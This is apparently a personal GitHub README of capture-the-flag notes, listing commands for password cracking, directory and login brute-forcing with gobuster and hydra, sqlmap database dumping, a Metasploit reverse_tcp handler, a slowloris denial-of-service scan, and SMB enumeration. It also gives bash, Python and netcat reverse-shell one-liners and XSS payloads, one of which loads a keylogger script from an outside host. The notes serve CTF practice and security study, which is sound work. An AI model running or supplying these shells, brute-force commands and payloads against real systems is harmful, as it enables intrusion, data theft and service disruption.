r0dok/CTF-Writeups
🛡️ CTF Writeups

A collection of useful commands and notes for Capture The Flag (CTF) competitions.


📋 Table of Contents

  1. Basic Commands
  2. Advanced Commands
  3. Nmap Usage
  4. Random Points from TryHackMe (THM)
  5. Additional Resources
  6. Conclusion

Basic Commands

  • zip2john: Convert a ZIP file to a format that John the Ripper can crack.

    zip2john file.zip > file.zip.hash
    john file.zip.hash
  • gobuster: Directory/file brute-forcing tool.

    gobuster dir -u TARGET -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
  • find: Search for files.

    find / -type f -regex '.*skat.txt$' 2> /dev/null
    find / -name findme.txt 2> test.txt
  • nmap: Network scanner.

    nmap -T4 -A -p- TARGET -oN nmap.txt
  • hydra: Online password brute-forcing tool for network login services (SSH, FTP, etc.).

    hydra -l mark -P /usr/share/wordlists/rockyou.txt IP_Address ssh
    hydra -l admin -x 4:4:MLVICDX -vV sshhydra.com ssh
    hydra -l admin -P /usr/share/john/password.lst -vV ftplogin.com ftp

Advanced Commands

  • Nmap Scripts: Use NSE scripts to identify vulnerabilities.

    nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p PORT -T4 IP_Address
    nmap --script http-slowloris --max-parallelism 400 IP_Address
  • SQLMap: Automatic SQL injection and database takeover tool.

    sqlmap -u "http://target.com/vulnerable_param" --batch --dbs
    sqlmap -u "http://target.com/vulnerable_param" -D database_name --tables
    sqlmap -u "http://target.com/vulnerable_param" -D database_name -T table_name --columns
    sqlmap -u "http://target.com/vulnerable_param" -D database_name -T table_name -C column_name --dump
  • Metasploit: Penetration testing framework.

    msfconsole
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST your_ip
    set LPORT your_port
    exploit
  • Burp Suite: Web application security testing suite (intercepting proxy, scanner, and manual tooling).

    • Intruder: Use Intruder to brute force login forms or find hidden parameters.
    • Repeater: Manually send and analyze HTTP requests.
  • Enumerating SMB shares:

    smbclient -L //TARGET_IP -U username
    smbmap -H TARGET_IP
  • Reverse Shells:

    • Bash:
      bash -i >& /dev/tcp/your_ip/your_port 0>&1
    • Python:
      python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("your_ip",your_port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
    • Netcat:
      nc -e /bin/sh your_ip your_port

Nmap Usage

  • OS Detection:
    nmap -O TARGET
  • Service Version Detection:
    nmap -sV TARGET
  • Stealth Scan:
    nmap -sS TARGET
  • Aggressive Scan:
    nmap -A TARGET

Random Points from TryHackMe (THM)

  • Popups: Creates a "Hello World" message popup in the user's browser.

    <script>alert("Hello World")</script>
  • Writing HTML: Overrides the website's HTML to add your own content.

    document.write("Your HTML code here");
  • XSS Keylogger: Captures the keystrokes of a user.

    <script src="http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js"></script>
  • Port Scanning:

    <script src="http://www.xss-payloads.com/payloads/scripts/portscanapjs.js"></script>

Additional Resources

  • GTFOBins: Unix binaries that can be used to bypass local security restrictions.
  • PayloadAllTheThings: A list of useful payloads and bypasses for Web Application Security.
  • HackTricks: A comprehensive guide for penetration testing and CTF challenges.

About

My CTF notes that I scribbled along the way